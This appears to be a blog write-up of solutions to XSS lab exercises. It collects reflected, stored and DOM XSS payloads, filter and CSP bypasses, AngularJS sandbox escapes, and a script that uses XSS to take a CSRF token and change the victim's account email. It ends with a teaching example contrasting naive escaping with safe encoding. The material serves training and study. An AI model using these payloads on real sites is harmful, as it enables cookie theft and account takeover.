Reflected DOM XSS - quotes escaped, backslash not
\"-alert(1)}//
The server escapes the double quote but not the backslash, so the injected backslash consumes the escaping one and the quote closes the string; } closes the object and // comments out the rest of the line.

Reflected XSS into HTML context with no encoding
<script>alert(1)</script>

Reflected XSS into HTML context with most tags and attributes blocked
<iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'>
body and onresize pass the filter; the frame resizes itself on load so the injected handler fires without user interaction.

Reflected XSS into HTML context with all tags blocked except custom ones using onfocus
<script>
location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
tabindex makes the custom element focusable and the #x fragment focuses it on load, so onfocus fires by itself.

Reflected XSS with event handlers and href attributes blocked
https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E
Decoded: <svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click here</text></a>. No href attribute appears in the submitted markup; animate sets it at runtime, and the victim has to click the text.

Reflected XSS with some SVG markup allowed using onbegin
https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

Reflected XSS into attribute with angle brackets HTML-encoded
"onmouseover="alert(1)

Stored XSS into HTML context with nothing encoded
<script>alert(1)</script>

Stored XSS into anchor href attribute with double quotes HTML-encoded
javascript:alert(1)

Reflected XSS in canonical link tag using OS access keys
https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1)
Fires when the victim presses the access-key chord for x; the exact chord is browser- and OS-specific.

Reflected XSS into a JavaScript string with single quote and backslash escaped
</script><script>alert(1)</script>
The HTML parser terminates the script block before the JavaScript parser ever sees the string, so escaping inside the string is irrelevant.

Reflected XSS into a JavaScript string with angle brackets HTML encoded
'-alert(1)-'

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped
Probes: test'payload (reflected as test\'payload) and test\payload (reflected unchanged) confirm that the quote is escaped but the backslash is not. Payload:
\'-alert(1)//

Reflected XSS in a JavaScript URL with some characters blocked
https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
Decoded: '},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:' . Comments stand in for the blocked spaces; window+'' forces the overridden toString to run, which installs alert as onerror and throws 1337.

Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
http://foo?&apos;-alert(1)-&apos;
The quote must be sent as the HTML entity &apos; (a literal ' would be escaped server-side); the browser decodes the entity inside the attribute value before the handler is parsed as JavaScript.

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped
${alert(1)}
Template-literal interpolation needs none of the escaped characters.

Reflected XSS with AngularJS sandbox escape without strings
https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
Overwriting String.prototype.charAt with [].join defeats the sandbox's character checks; the fromCharCode call spells x=alert(1) without a string literal.

Reflected XSS with AngularJS sandbox escape and CSP
<script>
location = 'https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';
</script>
No inline script is needed on the target: the expression lives in an ng-focus attribute, which CSP does not govern, $event.path exposes window to the orderBy filter expression, and #x focuses the input.

DOM XSS in document.write sink using source location.search
"><svg onload=alert(1)>

DOM XSS in document.write sink using source location.search inside a select element
param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)>

DOM XSS in innerHTML sink using source location.search
<img src=1 onerror=alert(1)>
innerHTML does not execute <script>, hence the event handler.

DOM XSS in jQuery anchor href attribute sink using location.search source
javascript:alert(document.cookie)

DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
{{$on.constructor('alert(1)')()}}

Stored DOM XSS
<><img src=1 onerror=alert(1)>
Defeats a sanitiser that only strips the first occurrence of < and >.

Exploiting XSS to perform CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get', '/site-endpoint', true);          // page that contains the victim's CSRF token
req.send();
function handleResponse() {
    // pull the token out of the hidden form field
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/site-endpoint/request', true);
    // most targets only parse the body as form fields with this content type
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    // placeholder address; substitute the value you want written to the victim's account
    changeReq.send('csrf=' + token + '&[email protected]');
};
</script>
Because the request is issued by the victim's own browser from the vulnerable origin, the CSRF token and session cookie both come along, so anti-CSRF tokens do not help once XSS is present.

Reflected XSS protected by CSP, with CSP bypass
https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
The token parameter is reflected into the Content-Security-Policy header; the injected script-src-elem directive takes precedence over script-src for script elements and allows the inline script.
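An added example, not code from the original page, for the two "backslash not escaped" entries above (Reflected DOM XSS with \"-alert(1)}// and the JavaScript string with single quotes escaped, \'-alert(1)//). The reflection functions and the eval-style sink are assumptions modelled on the lab descriptions; naiveJsonReflect, naiveScriptReflect, safeJsonReflect, safeScriptReflect and runScript are names chosen here. It runs each payload against the vulnerable reflection and its hardened counterpart and counts how often alert() was reached, without a browser.

```javascript
// Added example (not from the original page): why "quotes escaped, backslash not" is
// exploitable, and what a correct encoder does instead. The reflection logic and the
// eval-style sink are assumptions modelled on the lab descriptions; names are ours.

// Vulnerable JSON reflection: escapes " but not \, so an attacker-supplied backslash
// swallows the escaping backslash and the quote that follows it closes the string.
function naiveJsonReflect(term) {
  return '{"searchTerm":"' + term.replace(/"/g, '\\"') + '"}';
}

// Vulnerable inline-script reflection: the same mistake with single quotes.
function naiveScriptReflect(term) {
  return "var searchTerms = '" + term.replace(/'/g, "\\'") + "';";
}

// Hardened equivalents: JSON.stringify escapes both the quote and the backslash (and
// control characters), so no input can terminate the literal early. In the inline
// script case < is also escaped so that </script> cannot end the script block.
function safeJsonReflect(term) {
  return JSON.stringify({ searchTerm: term });
}
function safeScriptReflect(term) {
  return 'var searchTerms = ' + JSON.stringify(term).replace(/</g, '\\u003c') + ';';
}

// Stand-in for the browser: runs JavaScript source with a recording alert() so we can
// observe whether attacker code executed. The DOM XSS sink is eval('var data = ' + json);
// the script case is the page's own <script> text. Both payloads end in //, so the
// statement appended here must start on a new line or it would be commented out.
function runScript(source) {
  const calls = [];
  const recordingAlert = (x) => { calls.push(x); };
  let error = null;
  try {
    new Function('alert', source + '\nreturn;')(recordingAlert);
  } catch (e) {
    error = String(e);
  }
  return { calls, error };
}

const jsonPayload = '\\"-alert(1)}//';   // the bytes sent: \"-alert(1)}//
const scriptPayload = "\\'-alert(1)//";  // the bytes sent: \'-alert(1)//

// Runs all four combinations; calls.length is the number of times alert() fired.
function demonstrate() {
  return {
    naiveJson: runScript('var data = ' + naiveJsonReflect(jsonPayload)),
    safeJson: runScript('var data = ' + safeJsonReflect(jsonPayload)),
    naiveScript: runScript(naiveScriptReflect(scriptPayload)),
    safeScript: runScript(safeScriptReflect(scriptPayload)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('naive JSON   :', naiveJsonReflect(jsonPayload));
  console.log('naive script :', naiveScriptReflect(scriptPayload));
  for (const [name, r] of Object.entries(demonstrate())) {
    console.log(name, '-> alert() calls:', r.calls.length, r.error ? '(' + r.error + ')' : '');
  }
}
```

The naive reflections produce {"searchTerm":"\\"-alert(1)}//"} and var searchTerms = '\\'-alert(1)//'; in both the engine reads \\ as one literal backslash, the next quote ends the string, and -alert(1) runs as an expression. The fix is not to escape more characters by hand but to use an encoder that treats the backslash as the metacharacter it is.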
Author: Exploring Android and mobile web design, security, and development.
Archives: March 2021